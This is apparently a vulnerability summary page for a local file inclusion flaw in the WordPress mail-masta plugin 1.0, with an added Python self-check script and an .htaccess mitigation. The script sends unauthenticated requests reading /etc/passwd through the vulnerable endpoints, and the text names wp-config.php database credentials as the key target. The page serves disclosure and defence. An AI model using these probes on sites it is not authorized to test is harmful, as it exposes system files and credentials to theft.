This is a summary of the AI-generated 10-question deep analysis.
Q1: What is this vulnerability? (Essence + Consequences)
**Essence**: A critical input validation error in the WordPress 'mail-masta' plugin. **Consequences**: Allows Local File Inclusion (LFI).…
**Root Cause**: CWE-20 (Improper Input Validation). The plugin fails to sanitize user-supplied input in specific PHP files (`count_of_send.php` and `csvexport.php`).…
**Affected**: WordPress sites using the **mail-masta** plugin, specifically **version 1.0**. **Component**: The plugin itself is the weak link, not the WordPress core. Check your plugin list immediately!
Q4: What can hackers do? (Privileges/Data)
**Attacker Capabilities**: Can read arbitrary local files the web server process can access. **Key Target**: `wp-config.php` (contains DB credentials).…
**Threshold**: LOW. No authentication required for exploitation. **Access**: The publicly reachable endpoints (`count_of_send.php`, `csvexport.php`) can be targeted directly via HTTP requests.…
**Public Exploits**: YES. Multiple PoCs exist on GitHub (e.g., by p0dalirius, Hackhoven). **Tools**: Automated scanners like ProjectDiscovery Nuclei also have templates.…
**Self-Check**: 1. Scan for `mail-masta` plugin version 1.0. 2. Test URLs: `http://target/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php`, supplying a known, harmless file path (such as `/etc/passwd`) as the included-file parameter. 3. Look for that file's content in the response, not just an error message mentioning the path.…
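The three self-check steps above, as an added example (not code from the page, the plugin, or the PoCs it mentions). It assumes, since the page does not say so, that the included file path is passed in a GET parameter named `pl` (the name used by the public PoCs) and that `csvexport.php` lives under `inc/lists/`; the page only gives the directory of `count_of_send.php`. The parsing and detection helpers are pure, so they can be checked offline; only `run_checks()` touches the network, and it should be pointed only at hosts you are authorized to test.

```python
"""Offline-testable self-check for the mail-masta LFI described above.

Added example, not code from the page or the plugin. Assumptions not
stated on the page:
  - the included file path is read from a GET parameter named `pl`
    (the name the public PoCs use; treated as an assumption here);
  - csvexport.php lives under inc/lists/ (the page only gives the
    directory of count_of_send.php);
  - the plugin's readme.txt is reachable at the standard WordPress path.
"""
import re
import sys
import urllib.parse
import urllib.request
from typing import Dict, List, Optional

PLUGIN_DIR = "wp-content/plugins/mail-masta/"
README_PATH = PLUGIN_DIR + "readme.txt"
VULNERABLE_FILES = (
    PLUGIN_DIR + "inc/campaign/count_of_send.php",  # path given on the page
    PLUGIN_DIR + "inc/lists/csvexport.php",         # directory assumed
)
PARAM = "pl"                 # assumed parameter name (see docstring)
PROBE_FILE = "/etc/passwd"   # harmless, world-readable, easy to recognise
AFFECTED_VERSIONS = {"1.0"}  # the only version the page lists as affected

# A genuine include of /etc/passwd puts the root entry at the start of a
# line. Matching that, rather than the probe string itself, avoids false
# positives from error pages that merely echo the requested path back.
PASSWD_RE = re.compile(r"^root:[^:\n]*:0:0:", re.M)


def parse_plugin_version(readme_text: str) -> Optional[str]:
    """Return the 'Stable tag:' value from a WordPress plugin readme.txt."""
    m = re.search(r"^\s*Stable tag:\s*([\w.\-]+)", readme_text, re.M | re.I)
    return m.group(1) if m else None


def is_affected_version(version: Optional[str]) -> bool:
    """True only for versions the page lists; 'trunk' or None need manual review."""
    return version in AFFECTED_VERSIONS


def build_probe_urls(base_url: str, probe_file: str = PROBE_FILE) -> List[str]:
    """One probe URL per vulnerable endpoint, with the file path URL-encoded."""
    base = base_url.rstrip("/") + "/"
    query = urllib.parse.urlencode({PARAM: probe_file})
    return [f"{base}{path}?{query}" for path in VULNERABLE_FILES]


def looks_like_lfi_response(body: str) -> bool:
    """True when the response carries included file content, not an error page."""
    return PASSWD_RE.search(body) is not None


def fetch(url: str, timeout: float) -> str:
    """GET a URL; any network or HTTP error is treated as 'no content'."""
    req = urllib.request.Request(url, headers={"User-Agent": "mail-masta-selfcheck"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read(64 * 1024).decode("utf-8", "replace")
    except OSError:  # HTTPError, URLError and socket timeouts all derive from it
        return ""


def run_checks(base_url: str, timeout: float = 10.0) -> Dict[str, object]:
    """Steps 1-3 of the self-check: read the version, probe, inspect the bodies."""
    base = base_url.rstrip("/") + "/"
    version = parse_plugin_version(fetch(base + README_PATH, timeout))
    confirmed = [
        url for url in build_probe_urls(base_url)
        if looks_like_lfi_response(fetch(url, timeout))
    ]
    return {
        "version": version,
        "affected_version": is_affected_version(version),
        "lfi_confirmed": confirmed,
    }


if __name__ == "__main__":
    # Usage: python selfcheck.py https://your-site.example   (your own hosts only)
    result = run_checks(sys.argv[1])
    print(result)
    sys.exit(1 if result["lfi_confirmed"] or result["affected_version"] else 0)
```

A `Stable tag: trunk` readme, or a readme that is blocked, yields `version = None`, which the script deliberately reports as "needs manual review" rather than "safe"; a confirmed LFI hit is the authoritative signal regardless of what the readme says.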
**Workaround**: 1. **Disable/Uninstall** the plugin immediately if it is not essential. 2. If you must keep it, restrict access to `count_of_send.php` and `csvexport.php` via `.htaccess` or WAF rules. 3.…
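Step 2 of the workaround as an added `.htaccess` example (not from the page or the plugin). It goes in the site's root `.htaccess`, not inside the plugin directory, so a later plugin update cannot silently delete it; Apache 2.4 syntax is assumed, and `AllowOverride` must permit `AuthConfig` (or `All`) for the `Require` directive to take effect.

```apache
# Added example: deny direct HTTP access to the two files named on the page.
# Site-root .htaccess, Apache 2.4. Both filenames are specific enough that
# matching on the basename alone does not collide with other plugins.
<FilesMatch "^(count_of_send|csvexport)\.php$">
    Require all denied
</FilesMatch>
```

On Apache 2.2 replace `Require all denied` with `Order deny,allow` and `Deny from all`. Verify with `curl -s -o /dev/null -w '%{http_code}\n' 'http://target/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php'` and expect `403`. The rule is ignored entirely on nginx (which does not read `.htaccess`) and it does not fix the underlying include; it only removes the reachable entry points, so removing the plugin remains the real fix.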
**Urgency**: HIGH. Because it needs no authentication and public exploits and scanner templates exist, assume it is being exploited in the wild. **Priority**: Patch or remove immediately. Do not wait. The risk of credential theft via `wp-config.php` is immediate and severe.